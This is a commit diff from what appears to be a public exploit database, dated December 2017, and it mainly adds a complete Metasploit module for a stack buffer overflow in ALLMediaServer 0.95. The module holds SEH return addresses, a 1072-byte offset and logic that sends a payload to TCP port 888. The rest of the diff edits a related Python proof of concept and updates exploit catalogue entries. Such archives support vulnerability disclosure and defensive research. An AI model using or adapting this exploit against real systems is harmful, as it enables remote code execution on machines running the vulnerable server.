DB: 2017-12-29

2 changes to exploits/shellcodes ALLMediaServer 0.95 - Buffer Overflow ALLMediaServer 0.95 - Buffer Overflow (PoC) ALLMediaServer 0.95 - Buffer Overflow (Metasploit) DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)
2017-12-29 05:02:21 +00:00 · 2017-12-29 05:02:21 +00:00 · be0fb79789
commit be0fb79789
parent 267f841bd8
3 changed files with 83 additions and 9 deletions
--- a/exploits/windows/dos/43406.py
+++ b/exploits/windows/dos/43406.py
@ -11,13 +11,13 @@


 
-1. Description
-
-A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string.
-
-   
-2. Proof of Concept
-
+#1. Description
+#
+#A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string.
+#
+#   
+#2. Proof of Concept
+#
 

 #!/usr/bin/python
--- a/exploits/windows/remote/43407.rb
+++ b/exploits/windows/remote/43407.rb
@ -0,0 +1,73 @@
+require 'msf/core'
+ 
+class Metasploit4 < Msf::Exploit::Remote
+    Rank = NormalRanking
+ 
+    include Msf::Exploit::Remote::Tcp
+    include Msf::Exploit::Seh
+ 
+    def initialize(info = {})
+        super(update_info(info,
+            'Name'           => 'ALLMediaServer 0.95 Buffer Overflow',
+            'Description'    => %q{
+                This module exploits a stack buffer overflow in ALLMediaServer 0.95.
+                The vulnerability is caused due to a boundary error within the
+                handling of HTTP request.
+            },
+            'License'        => MSF_LICENSE,
+            'Author'         =>
+                [
+                    'Anurag Srivastava', # Remote exploit and Metasploit module
+                ],
+            'References'     =>
+                [
+                    [ 'EDB', '43406' ]
+                ],
+            'DefaultOptions' =>
+                {
+                    'ExitFunction' => 'process', #none/process/thread/seh
+                },
+            'Platform'       => 'win',
+            'Payload'        =>
+                {
+                    'BadChars' => "",
+                    'Space' => 660,
+                    'DisableNops' => true
+                },
+ 
+            'Targets'        =>
+                [
+                    [ 'ALLMediaServer 0.95 / Windows XP SP3 - English',
+                        {
+                            'Ret'       =>   0x00408315, # POP # POP # POP # RET 
+                            'Offset'    =>   1072
+                        }
+                    ],
+                    [ 'ALLMediaServer 0.95 / Windows 7 SP1 - English',
+                        {
+                            'Ret'       =>   0x00408315, #  POP # POP # POP # RET 
+                            'Offset'    =>   1072
+                        }
+                    ],
+                ],
+            'Privileged'     => false,
+            'DisclosureDate' => 'Dec 28 2017',
+            'DefaultTarget'  => 1))
+ 
+        register_options([Opt::RPORT(888)], self.class)
+ 
+    end
+	
+    def exploit
+        connect
+	buffer = ""
+        buffer << make_nops(target['Offset'])
+	buffer << generate_seh_record(target.ret)
+	buffer << make_nops(19)
+        buffer << payload.encoded
+        print_status("Sending payload ...")
+        sock.put(buffer)
+	handler
+        disconnect
+    end
+end
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -5435,7 +5435,7 @@ id,file,description,date,author,type,platform,port
 43391,exploits/windows/dos/43391.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow",2017-12-26,"Aloyce J. Makalanga",dos,windows,
 43401,exploits/hardware/dos/43401.py,"Telesquare SKT LTE Router SDT-CS3B1 - Denial of Service",2017-12-27,LiquidWorm,dos,hardware,
 43403,exploits/windows/dos/43403.py,"SysGauge Server 3.6.18 - Denial of Service",2017-12-27,"Ahmad Mahfouz",dos,windows,
-43406,exploits/windows/dos/43406.py,"ALLMediaServer 0.95 - Buffer Overflow",2017-12-27,"Aloyce J. Makalanga",dos,windows,
+43406,exploits/windows/dos/43406.py,"ALLMediaServer 0.95 - Buffer Overflow (PoC)",2017-12-27,"Aloyce J. Makalanga",dos,windows,
 41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
 41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
 41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
@ -15874,6 +15874,7 @@ id,file,description,date,author,type,platform,port
 43387,exploits/hardware/remote/43387.py,"Netcore / Netis Routers - UDP Backdoor Access",2016-12-15,nixawk,remote,hardware,53413
 43388,exploits/multiple/remote/43388.md,"Trend Micro Smart Protection Server - Session Hijacking / Log File Disclosure / Remote Command Execution / Cron Job Injection / Local File Inclusion / Stored Cross-Site Scripting / Improper Access Control",2017-12-19,CoreLabs,remote,multiple,
 43389,exploits/hardware/remote/43389.py,"COMTREND ADSL Router CT-5367 - Remote Code Execution",2017-12-26,TnMch,remote,hardware,
+43407,exploits/windows/remote/43407.rb,"ALLMediaServer 0.95 - Buffer Overflow (Metasploit)",2017-12-28,"Anurag Srivastava",remote,windows,
 41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
@ -37677,7 +37678,7 @@ id,file,description,date,author,type,platform,port
 43399,exploits/php/webapps/43399.txt,"Easy!Appointments 1.2.1 - Cross-Site Scripting",2017-12-27,LiquidWorm,webapps,php,
 43400,exploits/hardware/webapps/43400.html,"Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery",2017-12-27,LiquidWorm,webapps,hardware,
 43402,exploits/hardware/webapps/43402.txt,"Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure",2017-12-27,LiquidWorm,webapps,hardware,
-43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download",2017-12-27,"Glafkos Charalambous",webapps,aspx,
+43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)",2017-12-27,"Glafkos Charalambous",webapps,aspx,
 41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
 41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
 41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,